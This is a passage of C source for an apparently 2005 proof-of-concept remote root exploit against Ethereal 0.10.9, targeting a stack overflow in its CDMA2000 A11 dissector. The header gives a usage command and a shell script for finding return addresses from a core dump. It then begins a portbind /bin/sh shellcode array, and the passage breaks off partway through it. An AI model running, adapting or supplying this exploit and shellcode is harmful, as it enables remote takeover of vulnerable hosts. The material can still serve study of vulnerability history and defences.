1 /*
2 * Ethereal 0.10.9 and below proof−of−concept remote root exploit
3 * (c) 2005 Diego Giagio <dgiagio@irion.com.br>
4 *
5 * The CDMA2000 A11 protocol dissector (packet−3g−a11.c) has a stack-based buffer
6 * overflow vulnerability when decoding Airlink records. This vulnerability was also
7 * discovered by Diego Giagio on 01/March/2005. The vendor was immediately
8 * contacted.
9 *
10 *
11 * Notes:
12 *
13 * This program has only been tested on Linux.
14 *
15 * If your system isn't on the target list and you are running Linux (x86), you
16 * can easily find your system's ret address. See below:
17 *
18 * First you need to force Ethereal dump a core file.
19 * bash$ ./ethereal−g3−a11 −a 0xdeadbeef −s 1 −d <your_machine_ip> −p 65535
20 *
21 * Then, use the script below to find the ret address from the core file:
22 * −−snip−−
23 * #!/bin/sh
24 *
25 * ADDR=‘objdump −D −s core | \
26 * grep "90909090 90909090 90909090 90909090" | \
27 * head −2 | tail −1 | awk ’{print 0x$1}’‘
28 * echo "Address: 0x$ADDR"
29 * −−snip−−
30 *
31 * Use that address with the −a <address> option. Good luck.
32 *
33 *
34 * Greets:
35 *
36 * ttaranto, eniac, rogbas, pjoppert, skylazart, cync, runixd,
37 * surfer, setnf, cbc, SUiCiDE, _hide, Codak, dm_, nuTshell
38 *
39 * #buffer@ircs.ircsnet.net
40 *
41 */
42
43 #include <stdio.h>
44 #include <unistd.h>
45 #include <sys/types.h>
46 #include <sys/socket.h>
47 #include <netinet/in.h>
48 #include <errno.h>
49
50 /*
51 * portbind, execve /bin/sh linux shellcode by BreeZe <breeze@binbash.org>
52 */
53 char sc_portbind[] =
54 "\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d\x08"
55 "\xb0\x66\xcd\x80\x89\x45\x08\x43\x89\x5d\x14\x66\xc7\x45\x16\xff\xff\x31"
56 "\xc0\x89\x45\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10\xb0\x66\xcd\x80"
57 "\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45\x0c\x89\x45\x10\xb0"
58 "\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x4